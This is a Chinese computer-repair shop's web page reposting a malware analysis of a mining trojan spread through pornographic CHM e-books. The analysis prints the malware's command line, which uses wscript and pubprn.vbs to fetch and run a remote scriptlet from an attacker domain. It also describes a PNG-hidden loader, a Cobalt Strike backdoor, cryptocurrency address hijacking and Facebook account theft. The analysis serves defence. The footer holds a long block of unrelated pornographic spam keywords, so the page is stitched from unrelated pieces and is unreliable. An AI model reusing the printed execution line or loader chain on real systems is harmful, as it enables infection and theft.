錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務(wù)項目 服務(wù)報價 維修流程 IT外包服務(wù) 服務(wù)器維護 技術(shù)文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù)技術(shù)文章
挖礦木馬借“XX的秘密”等小黃書瘋傳,中毒后會劫持比特幣交易

作者: 佚名  日期:2018-06-05 10:42:53   來源: 本站整理

 一、概述
近期騰訊御見威脅情報中心捕獲到利用一堆色情類電子書(chm格式)傳播的惡意挖礦病毒,病毒使用一批極具誘惑力的文件名(本文分析樣本使用名為“想不想知道xx之間的秘密.chm”)在網(wǎng)絡(luò)中傳播。

病毒使用執(zhí)行遠程腳本的方法,并結(jié)合白利用,代碼混淆,無文件內(nèi)存裝載等技術(shù)來躲避安全廠商的查殺,受害者一旦打開這些chm格式的電子書,病毒便會隱藏進用戶機器中。
病毒目前行為主要有釋放挖礦病毒,安裝Chrome瀏覽器惡意插件,在用戶交易虛擬加密幣時劫持收款地址,盜取用戶facebook帳號信息,并自動在facebook網(wǎng)站分享若干“小黃書”chm下載鏈接實現(xiàn)蠕蟲式的傳播。

二、樣本分析
chm文檔結(jié)構(gòu)如下圖,運行chm文檔后文檔內(nèi)Load_HTML_CHM0.html內(nèi)混淆的腳本代碼會以命令行”C:\Windows\System32\wscript.exe” /b C:/Windows/System32/Printing_Admin_Scripts/zh-CN/pubprn.vbs 127.0.0.1 script:hxxp://png.realtimenews.tk/chm.sct 
來執(zhí)行hxxp://png.realtimenews.tk/chm.sct內(nèi)的遠程腳本。

腳本代碼通過訪問一個外部鏈接的圖片q.png,并查找圖片數(shù)據(jù)中的tEXt,iENd兩個標(biāo)記,截取tEXt+4位置到iENd-8處的文件內(nèi)容,Base64解碼后存放到Temp目錄以tmpg.Jpg命名,并用Rundll32.exe拉起執(zhí)行,tmpg.Jpg其實為一個帶有導(dǎo)出函數(shù)VoidFunc且加殼的DLL。
截取png中隱藏數(shù)據(jù)

q.png表象上看為一個透明背景中心發(fā)亮的PNG圖片。

q.png文件tEXt+4位置指向了一個BASE64編碼的PE文件內(nèi)容開始位置.

q.png文件iENd-8指向了一個BASE64編碼的PE文件內(nèi)容末尾位置。

Rundll32.exe進一步拉起執(zhí)行tmpg.Jpg

tmpg.Jpg為帶有導(dǎo)出函數(shù)VoidFunc的DLL

被RunDll32拉起的tmpg.Jpg通過執(zhí)行導(dǎo)出函數(shù)VoidFun,然后在內(nèi)存中解密出一段Shellcode,通過CreateThread的方式執(zhí)行起來。
創(chuàng)建線程執(zhí)行Shellcode

Shellcode代碼通過遍歷LDR鏈找到kernel32模塊,然后獲取LoadLibraryA的地址,加載Wininet模塊,然后獲得一系列網(wǎng)絡(luò)操作函數(shù)
InternetConnectA,httpOpenRequestA,httpSendRequestA地址調(diào)用,最終向域名
dazqc4f140wtl.cloudfront.net發(fā)送一個Get網(wǎng)絡(luò)請求,并使用InternetReadFIle來接收網(wǎng)絡(luò)文件數(shù)據(jù)流,請求域名藏在Shellcode的尾部。
Shellcode裝載Wininet模塊

Get請求域名藏在解密后的Shellcode尾部

通過抓包工具可以直接看到,Get請求后服務(wù)器發(fā)送回來的數(shù)據(jù)流有一個明文的PE文件,通過從內(nèi)存Dump出該模塊可知該模塊還是一個DLL,并使用反射式加載的方法,實現(xiàn)該模塊代碼不落地裝載。
病毒Get請求后返回的明文PE文件數(shù)據(jù)流

反射式加載的DLL

觀察該模塊可知為Cobalt Strike生成的DLL后門攻擊模塊,該后門攻擊模塊數(shù)據(jù)交互支持HTTP、HTTPS、DNS和SMB隧道協(xié)議,本次樣本使用HTTP協(xié)議的方式進行通信交互,后門攻擊模塊首先通過異或0×69解密出上線配置信息。



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數(shù)和判...
  • IIS 8 開啟 GZIP壓縮來減少網(wǎng)絡(luò)請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅(qū)動時提示不包含數(shù)字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    主站蜘蛛池模板: 无码人妻黑人中文字幕| 亚洲国产精品无码久久久秋霞1| 无码孕妇孕交在线观看| 无码少妇一区二区三区| 日韩毛片免费无码无毒视频观看| 亚洲成?v人片天堂网无码| 午夜不卡无码中文字幕影院| 免费人妻无码不卡中文字幕18禁| 亚洲av无码不卡| 国产台湾无码AV片在线观看| 欲色aV无码一区二区人妻| 亚洲中文字幕久久精品无码APP | 亚洲va成无码人在线观看 | 高清无码视频直接看| 国产AV天堂无码一区二区三区| 亚洲国产精品无码专区| 国产精品无码专区在线播放| AV无码久久久久不卡网站下载| 中文字幕乱妇无码AV在线| 国产精品爆乳奶水无码视频 | 亚洲精品GV天堂无码男同| 亚洲欧洲日产国码无码网站| 人妻少妇乱子伦无码专区| 四虎国产精品永久在线无码| 亚洲AV无码国产精品色| 无码人妻AV免费一区二区三区 | 亚洲AV无码国产一区二区三区| 久久人妻内射无码一区三区| 国内精品人妻无码久久久影院导航| 日韩中文无码有码免费视频 | 男人的天堂无码动漫AV| 手机永久无码国产AV毛片| 亚洲av永久无码制服河南实里| 中文字幕丰满乱子伦无码专区| 久久久久亚洲?V成人无码| 人妻AV中出无码内射| 中文字幕无码一区二区免费| 国产AV无码专区亚汌A√| 亚洲av无码不卡| 性色av极品无码专区亚洲| 人妻精品久久无码区洗澡|